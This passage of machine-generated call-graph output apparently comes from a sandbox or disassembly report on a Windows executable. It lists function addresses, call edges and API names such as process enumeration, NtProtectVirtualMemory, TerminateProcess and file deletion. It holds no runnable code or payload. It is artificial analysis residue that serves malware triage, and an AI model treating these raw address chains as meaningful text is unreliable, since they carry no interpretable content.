calls 98144->98149 98145->98113 98146->98120 98148 aa523c 59 API calls 98146->98148 98148->98120 98150 ae0beb 98149->98150 98222 aab020 98150->98222 98152->98097 98152->98133 98152->98140 98189 b1ccac 274 API calls 98152->98189 98154 aa6e4a 98153->98154 98156 aa6ff7 98153->98156 98155 aa74d0 98154->98155 98154->98156 98158 aa6f2c 98154->98158 98164 aa6fdb 98154->98164 98155->98164 99066 aa49e0 59 API calls __gmtime64_s 98155->99066 98156->98155 98163 aa6fbb Mailbox 98156->98163 98156->98164 98166 aa7076 98156->98166 98162 aa6f68 98158->98162 98158->98164 98158->98166 98160 adfc1e 98165 adfc30 98160->98165 99064 ac3f69 59 API calls __wtof_l 98160->99064 98162->98163 98162->98164 98167 adfa71 98162->98167 98163->98160 98163->98164 99065 aa41c4 59 API calls Mailbox 98163->99065 98164->98049 98165->98049 98166->98160 98166->98163 98166->98164 99063 af7aad 59 API calls 98166->99063 98167->98164 99062 ac3f69 59 API calls __wtof_l 98167->99062 98172 ac0fee 98170->98172 98173 ac1008 98172->98173 98175 ac100c std::exception::exception 98172->98175 99067 ac593c 98172->99067 99084 ac35d1 DecodePointer 98172->99084 98173->98049 99085 ac87cb RaiseException 98175->99085 98177 ac1036 99086 ac8701 58 API calls _free 98177->99086 98179 ac1048 98179->98049 98180->98051 98181->98050 98182->98063 98183->98050 98184->98050 98185->98128 98186->98140 98187->98105 98188->98152 98189->98152 98190->98096 98191->98133 98192->98130 98194 ae0b53 98193->98194 98195 b1a918 98193->98195 98194->98121 98194->98132 98196 ac0fe6 Mailbox 59 API calls 98195->98196 98199 b1a93a 98196->98199 98197 ac0fe6 Mailbox 59 API calls 98197->98199 98199->98194 98199->98197 98285 af715b 59 API calls Mailbox 98199->98285 98201 b078ac 98200->98201 98203 ae0b8d 98200->98203 98202 ac0fe6 Mailbox 59 API calls 98201->98202 98201->98203 98202->98203 98204 af6ebc 98203->98204 98205 af6f06 98204->98205 98212 af6f1c Mailbox 98204->98212 98308 ab1a36 98205->98308 98206 af6f5a 98286 aaa820 98206->98286 98207 af6f47 98312 b1c355 98207->98312 98212->98206 98212->98207 98213 af7002 98213->98152 98214 af6f91 98215 af6fdc 98214->98215 98216 af6f53 98214->98216 98218 af6fc1 98214->98218 98215->98216 98352 b0a48d 89 API calls 4 library calls 98215->98352 98353 af6cf1 59 API calls Mailbox 98216->98353 98303 af706d 98218->98303 98220->98137 98221->98144 98516 ab3740 98222->98516 98225 ae30b6 98620 b0a48d 89 API calls 4 library calls 98225->98620 98226 aab07f 98226->98225 98228 ae30d4 98226->98228 98245 aabb86 98226->98245 98246 aab132 Mailbox _memmove 98226->98246 98621 b0a48d 89 API calls 4 library calls 98228->98621 98230 ae355e 98242 aab4dd 98230->98242 98647 b0a48d 89 API calls 4 library calls 98230->98647 98231 ae318a 98231->98242 98623 b0a48d 89 API calls 4 library calls 98231->98623 98237 ae3106 98237->98231 98622 aaa9de 274 API calls 98237->98622 98239 aa53b0 274 API calls 98239->98246 98240 af730a 59 API calls 98240->98246 98241 aa3b31 59 API calls 98241->98246 98242->98152 98619 b0a48d 89 API calls 4 library calls 98245->98619 98246->98230 98246->98237 98246->98239 98246->98240 98246->98241 98246->98242 98246->98245 98247 ae3418 98246->98247 98253 ae31c3 98246->98253 98254 aa3c30 68 API calls 98246->98254 98256 ae346f 98246->98256 98260 aa523c 59 API calls 98246->98260 98261 ac0fe6 59 API calls Mailbox 98246->98261 98262 ab1c9c 59 API calls 98246->98262 98521 aa3add 98246->98521 98528 aabc70 98246->98528 98607 aa3a40 98246->98607 98618 aa5190 59 API calls Mailbox 98246->98618 98625 af6c62 59 API calls 2 library calls 98246->98625 98626 b1a9c3 85 API calls Mailbox 98246->98626 98627 af6c1e 59 API calls Mailbox 98246->98627 98628 b05ef2 68 API calls 98246->98628 98629 aa3ea3 98246->98629 98646 b0a12a 59 API calls 98246->98646 98248 aa53b0 274 API calls 98247->98248 98250 ae3448 98248->98250 98250->98242 98255 aa39be 68 API calls 98250->98255 98624 b0a48d 89 API calls 4 library calls 98253->98624 98254->98246 98255->98256 98645 b0a48d 89 API calls 4 library calls 98256->98645 98260->98246 98261->98246 98262->98246 98264->98133 98265->98122 98267 aa4d51 98266->98267 98279 aa4d4b 98266->98279 98268 addb28 __i64tow 98267->98268 98269 aa4d99 98267->98269 98271 aa4d57 __itow 98267->98271 98275 adda2f 98267->98275 99060 ac38c8 83 API calls 3 library calls 98269->99060 98273 ac0fe6 Mailbox 59 API calls 98271->98273 98276 aa4d71 98273->98276 98274 addaa7 Mailbox _wcscpy 99061 ac38c8 83 API calls 3 library calls 98274->99061 98275->98274 98277 ac0fe6 Mailbox 59 API calls 98275->98277 98278 ab1a36 59 API calls 98276->98278 98276->98279 98280 adda74 98277->98280 98278->98279 98279->98141 98281 ac0fe6 Mailbox 59 API calls 98280->98281 98282 adda9a 98281->98282 98282->98274 98283 ab1a36 59 API calls 98282->98283 98283->98274 98284->98129 98285->98199 98287 aaa84c 98286->98287 98288 ae2d51 98286->98288 98291 ae2d6a 98287->98291 98298 aaa888 _memmove 98287->98298 98355 b0a48d 89 API calls 4 library calls 98288->98355 98290 ae2d62 98290->98214 98356 b0a48d 89 API calls 4 library calls 98291->98356 98294 ac0fe6 59 API calls Mailbox 98294->98298 98295 ae2dae 98357 aaa9de 274 API calls 98295->98357 98296 aa53b0 274 API calls 98296->98298 98298->98294 98298->98295 98298->98296 98299 ae2dc8 98298->98299 98300 aaa975 98298->98300 98301 aaa962 98298->98301 98299->98300 98358 b0a48d 89 API calls 4 library calls 98299->98358 98300->98214 98301->98300 98354 b1a9c3 85 API calls Mailbox 98301->98354 98304 af7085 98303->98304 98359 b1495b 98304->98359 98368 b1f1b2 98304->98368 98305 af70d9 98305->98216 98309 ab1a45 __wsetenvp _memmove 98308->98309 98310 ac0fe6 Mailbox 59 API calls 98309->98310 98311 ab1a83 98310->98311 98311->98212 98313 b1c380 98312->98313 98314 b1c39a 98312->98314 98511 b0a48d 89 API calls 4 library calls 98313->98511 98316 b1a8fd 59 API calls 98314->98316 98317 b1c3a5 98316->98317 98318 aa53b0 273 API calls 98317->98318 98319 b1c406 98318->98319 98320 b1c392 Mailbox 98319->98320 98321 b1c498 98319->98321 98325 b1c447 98319->98325 98320->98216 98322 b1c4ee 98321->98322 98323 b1c49e 98321->98323 98322->98320 98324 aa4d37 84 API calls 98322->98324 98512 b07ed5 59 API calls 98323->98512 98326 b1c500 98324->98326 98328 b0789a 59 API calls 98325->98328 98329 ab1aa4 59 API calls 98326->98329 98331 b1c477 98328->98331 98332 b1c524 CharUpperBuffW 98329->98332 98330 b1c4c1 98513 ab35b9 59 API calls Mailbox 98330->98513 98334 af6ebc 273 API calls 98331->98334 98336 b1c53e 98332->98336 98334->98320 98335 b1c4c9 Mailbox 98339 aab020 273 API calls 98335->98339 98337 b1c591 98336->98337 98338 b1c545 98336->98338 98340 aa4d37 84 API calls 98337->98340 98343 b0789a 59 API calls 98338->98343 98339->98320 98341 b1c599 98340->98341 98514 aa5376 60 API calls 98341->98514 98344 b1c573 98343->98344 98345 af6ebc 273 API calls 98344->98345 98345->98320 98346 b1c5a3 98346->98320 98347 aa4d37 84 API calls 98346->98347 98348 b1c5be 98347->98348 98515 ab35b9 59 API calls Mailbox 98348->98515 98350 b1c5ce 98351 aab020 273 API calls 98350->98351 98351->98320 98352->98216 98353->98213 98354->98300 98355->98290 98356->98300 98357->98299 98358->98300 98360 ac0fe6 Mailbox 59 API calls 98359->98360 98361 b1496c 98360->98361 98373 ab433f 98361->98373 98364 aa4d37 84 API calls 98365 b1498d GetEnvironmentVariableW 98364->98365 98376 b07a51 59 API calls Mailbox 98365->98376 98367 b149aa 98367->98305 98369 aa4d37 84 API calls 98368->98369 98370 b1f1cf 98369->98370 98377 b04148 CreateToolhelp32Snapshot Process32FirstW 98370->98377 98372 b1f1de 98372->98305 98374 ac0fe6 Mailbox 59 API calls 98373->98374 98375 ab4351 98374->98375 98375->98364 98376->98367 98387 b04ce2 98377->98387 98379 b04244 FindCloseChangeNotification 98379->98372 98380 b04195 Process32NextW 98380->98379 98384 b0418e Mailbox 98380->98384 98381 ab1207 59 API calls 98381->98384 98382 ab1a36 59 API calls 98382->98384 98384->98379 98384->98380 98384->98381 98384->98382 98393 ac0119 98384->98393 98444 ab17e0 98384->98444 98453 ab151f 61 API calls 98384->98453 98388 b04d09 98387->98388 98389 b04cf0 98387->98389 98455 ac37c3 59 API calls __wcstoi64 98388->98455 98389->98388 98392 b04d0f 98389->98392 98454 ac385c GetStringTypeW _iswctype 98389->98454 98392->98384 98456 ab1207 98393->98456 98396 ab1207 59 API calls 98397 ac0137 98396->98397 98398 ab1207 59 API calls 98397->98398 98399 ac013f 98398->98399 98400 ab1207 59 API calls 98399->98400 98401 ac0147 98400->98401 98402 af627d 98401->98402 98403 ac017b 98401->98403 98404 ab1c9c 59 API calls 98402->98404 98405 ab1462 59 API calls 98403->98405 98406 af6286 98404->98406 98407 ac0189 98405->98407 98481 ab19e1 98406->98481 98474 ab1981 98407->98474 98410 ac0193 98412 ac01be 98410->98412 98413 ab1462 59 API calls 98410->98413 98411 ac01fe 98461 ab1462 98411->98461 98412->98411 98415 ac01dd 98412->98415 98425 af62a6 98412->98425 98416 ac01b4 98413->98416 98478 ab1609 98415->98478 98418 ab1981 59 API calls 98416->98418 98417 af6376 98421 ab1821 59 API calls 98417->98421 98418->98412 98420 ac020f 98423 ac0221 98420->98423 98426 ab1c9c 59 API calls 98420->98426 98439 af6333 98421->98439 98424 ac0231 98423->98424 98427 ab1c9c 59 API calls 98423->98427 98429 ac0238 98424->98429 98431 ab1c9c 59 API calls 98424->98431 98425->98417 98428 af635f 98425->98428 98438 af62dd 98425->98438 98426->98423 98427->98424 98428->98417 98434 af634a 98428->98434 98432 ab1c9c 59 API calls 98429->98432 98441 ac023f Mailbox 98429->98441 98430 ab1462 59 API calls 98430->98411 98431->98429 98432->98441 98433 ab1609 59 API calls 98433->98439 98437 ab1821 59 API calls 98434->98437 98435 af633b 98436 ab1821 59 API calls 98435->98436 98436->98439 98437->98439 98438->98435 98442 af6326 98438->98442 98439->98411 98439->98433 98494 ab153b 59 API calls 2 library calls 98439->98494 98441->98384 98485 ab1821 98442->98485 98445 ab17f2 98444->98445 98446 aef401 98444->98446 98504 ab1680 98445->98504 98510 af87f9 59 API calls _memmove 98446->98510 98449 ab17fe 98449->98384 98450 aef40b 98451 ab1c9c 59 API calls 98450->98451 98452 aef413 Mailbox 98451->98452 98453->98384 98454->98389 98455->98392 98457 ac0fe6 Mailbox 59 API calls 98456->98457 98458 ab1228 98457->98458 98459 ac0fe6 Mailbox 59 API calls 98458->98459 98460 ab1236 98459->98460 98460->98396 98462 ab14ce 98461->98462 98463 ab1471 98461->98463 98465 ab1981 59 API calls 98462->98465 98463->98462 98464 ab147c 98463->98464 98466 aef1de 98464->98466 98467 ab1497 98464->98467 98471 ab149f _memmove 98465->98471 98496 ab1c7e 98466->98496 98495 ab1b7c 59 API calls Mailbox 98467->98495 98470 aef1e8 98472 ac0fe6 Mailbox 59 API calls 98470->98472 98471->98420 98473 aef208 98472->98473 98475 ab198f 98474->98475 98477 ab1998 _memmove 98474->98477 98475->98477 98499 ab1aa4 98475->98499 98477->98410 98479 ab1aa4 59 API calls 98478->98479 98480 ab1614 98479->98480 98480->98411 98480->98430 98482 ab19fb 98481->98482 98483 ab19ee 98481->98483 98484 ac0fe6 Mailbox 59 API calls 98482->98484 98483->98412 98484->98483 98486 ab189a 98485->98486 98487 ab182d __wsetenvp 98485->98487 98488 ab1981 59 API calls 98486->98488 98489 ab1868 98487->98489 98490 ab1843 98487->98490 98493 ab184b _memmove 98488->98493 98492 ab1c7e 59 API calls 98489->98492 98503 ab1b7c 59 API calls Mailbox 98490->98503 98492->98493 98493->98439 98494->98439 98495->98471 98497 ac0fe6 Mailbox 59 API calls 98496->98497 98498 ab1c88 98497->98498 98498->98470 98500 ab1ab7 98499->98500 98502 ab1ab4 _memmove 98499->98502 98501 ac0fe6 Mailbox 59 API calls 98500->98501 98501->98502 98502->98477 98503->98493 98505 ab1692 98504->98505 98509 ab16ba _memmove 98504->98509 98506 ac0fe6 Mailbox 59 API calls 98505->98506 98505->98509 98508 ab176f _memmove 98506->98508 98507 ac0fe6 Mailbox 59 API calls 98507->98508 98508->98507 98509->98449 98510->98450 98511->98320 98512->98330 98513->98335 98514->98346 98515->98350 98517 ab374f 98516->98517 98520 ab376a 98516->98520 98518 ab1aa4 59 API calls 98517->98518 98519 ab3757 CharUpperBuffW 98518->98519 98519->98520 98520->98226 98522 add3cd 98521->98522 98523 aa3aee 98521->98523 98524 ac0fe6 Mailbox 59 API calls 98523->98524 98525 aa3af5 98524->98525 98526 aa3b16 98525->98526 98648 aa3ba5 59 API calls Mailbox 98525->98648 98526->98246 98529 ae359f 98528->98529 98541 aabc95 98528->98541 98720 b0a48d 89 API calls 4 library calls 98529->98720 98531 aabf3b 98531->98246 98533 aac2b6 98533->98531 98536 aac2c3 98533->98536 98718 aac483 274 API calls Mailbox 98536->98718 98538 aabf25 Mailbox 98538->98531 98717 aac460 10 API calls Mailbox 98538->98717 98540 aac2ca LockWindowUpdate DestroyWindow GetMessageW 98540->98531 98542 aac2fc 98540->98542 98563 aabca5 Mailbox 98541->98563 98721 aa5376 60 API calls 98541->98721 98722 af700c 274 API calls 98541->98722 98543 ae4509 TranslateMessage DispatchMessageW GetMessageW 98542->98543 98543->98543 98545 ae4539 98543->98545 98544 ae36b3 Sleep 98544->98563 98545->98531 98547 ae405d WaitForSingleObject 98552 ae407d GetExitCodeProcess CloseHandle 98547->98552 98547->98563 98548 aabf54 timeGetTime 98548->98563 98549 ab1c9c 59 API calls 98549->98563 98550 ab1207 59 API calls 98574 aac1fa Mailbox 98550->98574 98551 aac210 Sleep 98551->98574 98571 aac36b 98552->98571 98553 ac0fe6 59 API calls Mailbox 98553->98563 98555 ae43a9 Sleep 98555->98574 98556 ac083e timeGetTime 98556->98574 98557 aa6cd8 252 API calls 98557->98563 98559 aac324 timeGetTime 98719 aa5376 60 API calls 98559->98719 98560 b04148 66 API calls 98560->98574 98562 ae4440 GetExitCodeProcess 98566 ae446c CloseHandle 98562->98566 98567 ae4456 WaitForSingleObject 98562->98567 98563->98538 98563->98544 98563->98547 98563->98548 98563->98549 98563->98551 98563->98553 98563->98555 98563->98557 98563->98559 98564 aa4d37 84 API calls 98563->98564 98570 aa6d79 109 API calls 98563->98570 98563->98571 98563->98574 98579 aa5376 60 API calls 98563->98579 98582 aab020 252 API calls 98563->98582 98584 aac26d 98563->98584 98585 ab1a36 59 API calls 98563->98585 98588 b1c355 252 API calls 98563->98588 98589 aa39be 68 API calls 98563->98589 98591 b0a48d 89 API calls 98563->98591 98592 aaa820 252 API calls 98563->98592 98593 aa5190 59 API calls Mailbox 98563->98593 98594 aa53b0 252 API calls 98563->98594 98595 af6cf1 59 API calls Mailbox 98563->98595 98596 aa3a40 59 API calls 98563->98596 98597 ae3e13 VariantClear 98563->98597 98598 ae3ea9 VariantClear 98563->98598 98599 aa41c4 59 API calls Mailbox 98563->98599 98600 ae3c57 VariantClear 98563->98600 98601 af7aad 59 API calls 98563->98601 98602 aa3ea3 68 API calls 98563->98602 98649 aa52b0 98563->98649 98658 aa9a00 98563->98658 98665 aa9c80 98563->98665 98696 b0c270 98563->98696 98703 b1eedb 98563->98703 98711 b1e620 98563->98711 98714 b1e60c 98563->98714 98723 b26655 59 API calls 98563->98723 98724 b0a058 59 API calls Mailbox 98563->98724 98725 afe0aa 59 API calls 98563->98725 98726 af6c62 59 API calls 2 library calls 98563->98726 98727 aa38ff 59 API calls 98563->98727 98564->98563 98566->98574 98567->98563 98567->98566 98568 b26562 110 API calls 98568->98574 98570->98563 98571->98246 98572 ae38aa Sleep 98572->98563 98573 ae44c8 Sleep 98573->98563 98574->98550 98574->98551 98574->98556 98574->98560 98574->98562 98574->98563 98574->98568 98574->98571 98574->98572 98574->98573 98577 ab1a36 59 API calls 98574->98577 98581 aa3ea3 68 API calls 98574->98581 98728 b02baf 60 API calls 98574->98728 98729 aa5376 60 API calls 98574->98729 98730 aa6cd8 274 API calls 98574->98730 98731 af70e2 59 API calls 98574->98731 98732 b057ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98574->98732 98577->98574 98579->98563 98581->98574 98582->98563 98587 ab1a36 59 API calls 98584->98587 98585->98563 98587->98538 98588->98563 98589->98563 98591->98563 98592->98563 98593->98563 98594->98563 98595->98563 98596->98563 98597->98563 98598->98563 98599->98563 98600->98563 98601->98563 98602->98563 98608 add3b1 98607->98608 98610 aa3a53 98607->98610 98609 add3c1 98608->98609 99050 af6d17 59 API calls 98608->99050 98612 aa3a7d 98610->98612 98613 aa3b31 59 API calls 98610->98613 98617 aa3a9a Mailbox 98610->98617 98614 aa3a83 98612->98614 99041 aa3b31 98612->99041 98613->98612 98614->98617 99049 aa5190 59 API calls Mailbox 98614->99049 98617->98246 98618->98246 98619->98225 98620->98242 98621->98242 98622->98231 98623->98242 98624->98242 98625->98246 98626->98246 98627->98246 98628->98246 99052 aa3c30 98629->99052 98631 aa3eb3 98632 aa3f2d 98631->98632 98633 aa3ebd 98631->98633 98635 aa523c 59 API calls 98632->98635 98634 ac0fe6 Mailbox 59 API calls 98633->98634 98636 aa3ece 98634->98636 98644 aa3f1d 98635->98644 98637 aa3edc 98636->98637 98638 ab1207 59 API calls 98636->98638 98639 aa3eeb 98637->98639 98640 ab1bcc 59 API calls 98637->98640 98638->98637 98641 ac0fe6 Mailbox 59 API calls 98639->98641 98640->98639 98642 aa3ef5 98641->98642 99059 aa3bc8 68 API calls 98642->99059 98644->98246 98645->98242 98646->98246 98647->98242 98648->98526 98650 aa52c6 98649->98650 98652 aa5313 98649->98652 98651 aa52d3 PeekMessageW 98650->98651 98650->98652 98651->98652 98653 aa52ec 98651->98653 98652->98653 98655 addf68 TranslateAcceleratorW 98652->98655 98656 aa533e PeekMessageW 98652->98656 98657 aa5352 TranslateMessage DispatchMessageW 98652->98657 98733 aa359e 98652->98733 98653->98563 98655->98652 98655->98656 98656->98652 98656->98653 98657->98656 98659 aa9a1d 98658->98659 98660 aa9a31 98658->98660 98738 aa94e0 98659->98738 98772 b0a48d 89 API calls 4 library calls 98660->98772 98662 aa9a28 98662->98563 98664 ae2478 98664->98664 98666 aa9cb5 98665->98666 98667 ae247d 98666->98667 98670 aa9d1f 98666->98670 98674 aa9d79 98666->98674 98668 aa53b0 274 API calls 98667->98668 98669 ae2492 98668->98669 98695 aa9f50 Mailbox 98669->98695 98793 b0a48d 89 API calls 4 library calls 98669->98793 98673 ab1207 59 API calls 98670->98673 98670->98674 98671 ab1207 59 API calls 98671->98674 98675 ae24d8 98673->98675 98674->98671 98676 ac2f70 __cinit 67 API calls 98674->98676 98678 ae24fa 98674->98678 98682 aa9f3a 98674->98682 98674->98695 98677 ac2f70 __cinit 67 API calls 98675->98677 98676->98674 98677->98674 98678->98563 98679 aa39be 68 API calls 98679->98695 98681 aa53b0 274 API calls 98681->98695 98682->98695 98794 b0a48d 89 API calls 4 library calls 98682->98794 98685 aaa775 98798 b0a48d 89 API calls 4 library calls 98685->98798 98687 ae27f9 98687->98563 98688 aa4230 59 API calls 98688->98695 98690 b0a48d 89 API calls 98690->98695 98694 aaa058 98694->98563 98695->98679 98695->98681 98695->98685 98695->98688 98695->98690 98695->98694 98789 ab1bcc 98695->98789 98795 af7aad 59 API calls 98695->98795 98796 b1ccac 274 API calls 98695->98796 98797 b1bc26 274 API calls Mailbox 98695->98797 98799 aa5190 59 API calls Mailbox 98695->98799 98800 b19ab0 274 API calls Mailbox 98695->98800 98697 aa4d37 84 API calls 98696->98697 98698 b0c286 98697->98698 98801 b04005 98698->98801 98700 b0c28e 98701 b0c292 GetLastError 98700->98701 98702 b0c2a7 98700->98702 98701->98702 98702->98563 98704 b1ef1e 98703->98704 98710 b1eef7 98703->98710 98705 b1ef40 98704->98705 98888 aa502b 59 API calls 98704->98888 98708 b1ef84 98705->98708 98705->98710 98889 aa502b 59 API calls 98705->98889 98855 b06818 98708->98855 98710->98563 98930 b1d1c6 98711->98930 98713 b1e630 98713->98563 98715 b1d1c6 130 API calls 98714->98715 98716 b1e61c 98715->98716 98716->98563 98717->98533 98718->98540 98719->98563 98720->98541 98721->98541 98722->98541 98723->98563 98724->98563 98725->98563 98726->98563 98727->98563 98728->98574 98729->98574 98730->98574 98731->98574 98732->98574 98734 aa35b0 98733->98734 98735 aa35e2 98733->98735 98734->98735 98736 aa35d5 IsDialogMessageW 98734->98736 98737 add273 GetClassLongW 98734->98737 98735->98652 98736->98734 98736->98735 98737->98734 98737->98736 98739 aa53b0 274 API calls 98738->98739 98740 aa951f 98739->98740 98741 aa9527 _memmove 98740->98741 98742 ae2001 98740->98742 98744 aa9944 98741->98744 98747 aa9583 98741->98747 98748 ac0fe6 59 API calls Mailbox 98741->98748 98755 ae22c0 98741->98755 98756 aa96cf 98741->98756 98770 aa9741 98741->98770 98781 aa5190 59 API calls Mailbox 98742->98781 98752 ac0fe6 Mailbox 59 API calls 98744->98752 98746 ae22de 98746->98746 98747->98662 98748->98741 98749 aa986a 98750 aa987f 98749->98750 98751 ae22b1 98749->98751 98753 ac0fe6 Mailbox 59 API calls 98750->98753 98786 b1a983 59 API calls 98751->98786 98762 aa96e3 _memmove 98752->98762 98765 aa977d 98753->98765 98787 b0a48d 89 API calls 4 library calls 98755->98787 98756->98744 98758 aa96dc 98756->98758 98757 ac0fe6 Mailbox 59 API calls 98761 aa970e 98757->98761 98760 ac0fe6 Mailbox 59 API calls 98758->98760 98759 ae22a0 98785 b0a48d 89 API calls 4 library calls 98759->98785 98760->98762 98761->98770 98773 aacca0 98761->98773 98762->98757 98762->98761 98762->98770 98765->98662 98767 ae2278 98784 b0a48d 89 API calls 4 library calls 98767->98784 98769 ae2253 98783 b0a48d 89 API calls 4 library calls 98769->98783 98770->98749 98770->98759 98770->98765 98770->98767 98770->98769 98782 aa8180 274 API calls 98770->98782 98772->98664 98774 aaccda 98773->98774 98775 aacd02 98773->98775 98776 aa9c80 274 API calls 98774->98776 98778 aacce0 98774->98778 98777 aa53b0 274 API calls 98775->98777 98775->98778 98779 ae4971 98775->98779 98776->98778 98777->98779 98778->98770 98779->98778 98788 b0a48d 89 API calls 4 library calls 98779->98788 98781->98744 98782->98770 98783->98765 98784->98765 98785->98765 98786->98755 98787->98746 98788->98778 98790 ab1bef _memmove 98789->98790 98791 ab1bdc 98789->98791 98790->98695 98791->98790 98792 ac0fe6 Mailbox 59 API calls 98791->98792 98792->98790 98793->98695 98794->98695 98795->98695 98796->98695 98797->98695 98798->98687 98799->98695 98800->98695 98802 ab1207 59 API calls 98801->98802 98803 b04024 98802->98803 98804 ab1207 59 API calls 98803->98804 98805 b0402d 98804->98805 98806 ab1207 59 API calls 98805->98806 98807 b04036 98806->98807 98825 ac0284 98807->98825 98812 b0405c 98814 ac0119 59 API calls 98812->98814 98813 ab1900 59 API calls 98813->98812 98815 b04070 FindFirstFileW 98814->98815 98816 b040fc FindClose 98815->98816 98819 b0408f 98815->98819 98821 b04107 Mailbox 98816->98821 98817 b040d7 FindNextFileW 98817->98819 98818 ab1c9c 59 API calls 98818->98819 98819->98816 98819->98817 98819->98818 98820 ab17e0 59 API calls 98819->98820 98837 ab1900 98819->98837 98820->98819 98821->98700 98824 b040f3 FindClose 98824->98821 98844 ad1b70 98825->98844 98828 ac02cd 98831 ab19e1 59 API calls 98828->98831 98829 ac02b0 98830 ab1821 59 API calls 98829->98830 98832 ac02bc 98830->98832 98831->98832 98846 ab133d 98832->98846 98835 b04fec GetFileAttributesW 98836 b0404a 98835->98836 98836->98812 98836->98813 98838 aef534 98837->98838 98839 ab1914 98837->98839 98841 ab1c7e 59 API calls 98838->98841 98850 ab18a5 98839->98850 98843 aef53f __wsetenvp _memmove 98841->98843 98842 ab191f DeleteFileW 98842->98817 98842->98824 98845 ac0291 GetFullPathNameW 98844->98845 98845->98828 98845->98829 98847 ab134b 98846->98847 98848 ab1981 59 API calls 98847->98848 98849 ab135b 98848->98849 98849->98835 98851 ab18b4 __wsetenvp 98850->98851 98852 ab18c5 _memmove 98851->98852 98853 ab1c7e 59 API calls 98851->98853 98852->98842 98854 aef4f1 _memmove 98853->98854 98890 b06735 98855->98890 98858 b068b1 98861 b06921 98858->98861 98864 b06917 98858->98864 98869 b068ca 98858->98869 98859 b06899 98906 b06a73 89 API calls 2 library calls 98859->98906 98862 b06951 98861->98862 98863 b0699f 98861->98863 98885 b0683d _memmove 98861->98885 98867 b06971 98862->98867 98868 b06956 98862->98868 98865 b069a6 98863->98865 98866 b06a3a 98863->98866 98864->98861 98870 b068fe 98864->98870 98871 b069a9 98865->98871 98872 b06a1c 98865->98872 98866->98885 98915 aa50d5 59 API calls 98866->98915 98867->98885 98911 aa5087 59 API calls 98867->98911 98868->98885 98910 aa5087 59 API calls 98868->98910 98907 b08cd0 61 API calls 98869->98907 98897 b07c7f 98870->98897 98876 b069e5 98871->98876 98877 b069ad 98871->98877 98872->98885 98914 aa50d5 59 API calls 98872->98914 98876->98885 98913 aa50d5 59 API calls 98876->98913 98877->98885 98912 aa50d5 59 API calls 98877->98912 98882 b068d2 98908 b08cd0 61 API calls 98882->98908 98885->98710 98886 b068e9 _memmove 98909 b08cd0 61 API calls 98886->98909 98888->98705 98889->98708 98891 b06785 98890->98891 98895 b06746 98890->98895 98926 aa502b 59 API calls 98891->98926 98892 b06783 98892->98858 98892->98859 98892->98885 98894 aa4d37 84 API calls 98894->98895 98895->98892 98895->98894 98916 ac312d 98895->98916 98898 b07c8a 98897->98898 98899 ac0fe6 Mailbox 59 API calls 98898->98899 98900 b07c91 98899->98900 98901 b07c9d 98900->98901 98902 b07cbe 98900->98902 98903 ac0fe6 Mailbox 59 API calls 98901->98903 98904 ac0fe6 Mailbox 59 API calls 98902->98904 98905 b07ca6 _memset 98903->98905 98904->98905 98905->98885 98906->98885 98907->98882 98908->98886 98909->98870 98910->98885 98911->98885 98912->98885 98913->98885 98914->98885 98915->98885 98917 ac31ae 98916->98917 98918 ac3139 98916->98918 98929 ac31c0 60 API calls 4 library calls 98917->98929 98925 ac315e 98918->98925 98927 ac8d58 58 API calls __getptd_noexit 98918->98927 98920 ac31bb 98920->98895 98922 ac3145 98928 ac8fe6 9 API calls __ftell_nolock 98922->98928 98924 ac3150 98924->98895 98925->98895 98926->98892 98927->98922 98928->98924 98929->98920 98931 aa4d37 84 API calls 98930->98931 98932 b1d203 98931->98932 98951 b1d24a Mailbox 98932->98951 98968 b1de8e 98932->98968 98934 b1d4a2 98935 b1d617 98934->98935 98939 b1d4b0 98934->98939 99018 b1dfb1 92 API calls Mailbox 98935->99018 98938 b1d626 98938->98939 98940 b1d632 98938->98940 98981 b1d057 98939->98981 98940->98951 98941 aa4d37 84 API calls 98959 b1d29b Mailbox 98941->98959 98946 b1d4e9 98996 ac0e38 98946->98996 98949 b1d503 99003 b0a48d 89 API calls 4 library calls 98949->99003 98950 b1d51c 99004 aa47be 98950->99004 98951->98713 98955 b1d50e GetCurrentProcess TerminateProcess 98955->98950 98959->98934 98959->98941 98959->98951 99001 b0fc0d 59 API calls 2 library calls 98959->99001 99002 b1d6c8 61 API calls 2 library calls 98959->99002 98960 b1d68d 98960->98951 98964 b1d6a1 FreeLibrary 98960->98964 98961 b1d554 99016 b1dd32 107 API calls _free 98961->99016 98964->98951 98966 b1d565 98966->98960 98967 aa523c 59 API calls 98966->98967 99017 aa4230 59 API calls Mailbox 98966->99017 99019 b1dd32 107 API calls _free 98966->99019 98967->98966 98969 ab1aa4 59 API calls 98968->98969 98970 b1dea9 CharLowerBuffW 98969->98970 99020 aff903 98970->99020 98974 ab1207 59 API calls 98975 b1dee2 98974->98975 98976 ab1462 59 API calls 98975->98976 98977 b1def9 98976->98977 98978 ab1981 59 API calls 98977->98978 98979 b1df05 Mailbox 98978->98979 98980 b1df41 Mailbox 98979->98980 99027 b1d6c8 61 API calls 2 library calls 98979->99027 98980->98959 98982 b1d072 98981->98982 98986 b1d0c7 98981->98986 98983 ac0fe6 Mailbox 59 API calls 98982->98983 98984 b1d094 98983->98984 98985 ac0fe6 Mailbox 59 API calls 98984->98985 98984->98986 98985->98984 98987 b1e139 98986->98987 98988 b1e362 Mailbox 98987->98988 98995 b1e15c _strcat _wcscpy __wsetenvp 98987->98995 98988->98946 98989 aa50d5 59 API calls 98989->98995 98990 aa502b 59 API calls 98990->98995 98991 aa5087 59 API calls 98991->98995 98992 aa4d37 84 API calls 98992->98995 98993 ac593c 58 API calls __crtLCMapStringA_stat 98993->98995 98995->98988 98995->98989 98995->98990 98995->98991 98995->98992 98995->98993 99030 b05e42 61 API calls 2 library calls 98995->99030 98997 ac0e4d 98996->98997 98998 ac0ee5 NtProtectVirtualMemory 98997->98998 98999 ac0eb3 98997->98999 99000 ac0ed3 FindCloseChangeNotification 98997->99000 98998->98999 98999->98949 98999->98950 99000->98999 99001->98959 99002->98959 99003->98955 99005 aa47c6 99004->99005 99006 ac0fe6 Mailbox 59 API calls 99005->99006 99007 aa47d4 99006->99007 99008 aa47e0 99007->99008 99031 aa46ec 59 API calls Mailbox 99007->99031 99010 aa4540 99008->99010 99032 aa4650 99010->99032 99012 aa454f 99013 ac0fe6 Mailbox 59 API calls 99012->99013 99014 aa45eb 99012->99014 99013->99014 99014->98966 99015 aa4230 59 API calls Mailbox 99014->99015 99015->98961 99016->98966 99017->98966 99018->98938 99019->98966 99022 aff92e __wsetenvp 99020->99022 99021 aff96d 99021->98974 99021->98979 99022->99021 99023 aff963 99022->99023 99025 